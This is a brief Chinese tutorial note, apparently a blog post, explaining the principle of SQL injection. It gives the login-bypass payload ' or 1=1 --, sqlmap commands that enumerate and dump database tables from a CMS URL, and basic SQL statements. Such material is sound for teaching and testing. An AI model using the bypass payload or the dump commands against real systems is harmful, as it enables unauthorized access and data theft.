sql注入原理
sql注入原理
登录SQL语句:
select * from admin where username = ‘用户输入的用户名‘ and password =用户输入的密码‘
用户输入的内容可由用户自行控制,例如可以输入‘or 1=1 --空格
SQL语句:
select * from admin where username=‘ or 1=1 -- ‘ and password = ‘用户输入的密码‘
sqlmap
使用sqlmap探测注入点
sqlmap -u "192.168.1.104: 8081/ cms/articles.php?id=1" - dbs ?sqlmap -u "192. 168.1.104 : 8081/ cms/articles. php?id=1" -D 数据库 -T 表名 -C 字段1, 字段2 --dump
sql基础(增删改查)
增?INSERT INTO 表(字段1,字段2) VALUES (值1,值2);?删?DELETE FROM 表 where 条件;?改?UPDATE 表 SET 列1=值1,列2=值2 WHERE 条件?查?select 字段1,字段2 from 表 where 条件
相关推荐
godfather 2020-06-13
xuanlvhaoshao 2020-02-21
tanrong 2020-02-15
gwn00 2020-02-01
chenjiazhu 2020-07-08
一对儿程序猿 2020-07-04
tanrong 2020-06-11
ALiDan 2020-07-27
qshpeng 2020-07-26
世樹 2020-07-17
明月清风精进不止 2020-06-13
ItBJLan 2020-06-11
ALiDan 2020-06-11
码墨 2020-06-09
世樹 2020-06-05
lt云飞扬gt 2020-06-03
godfather 2020-06-03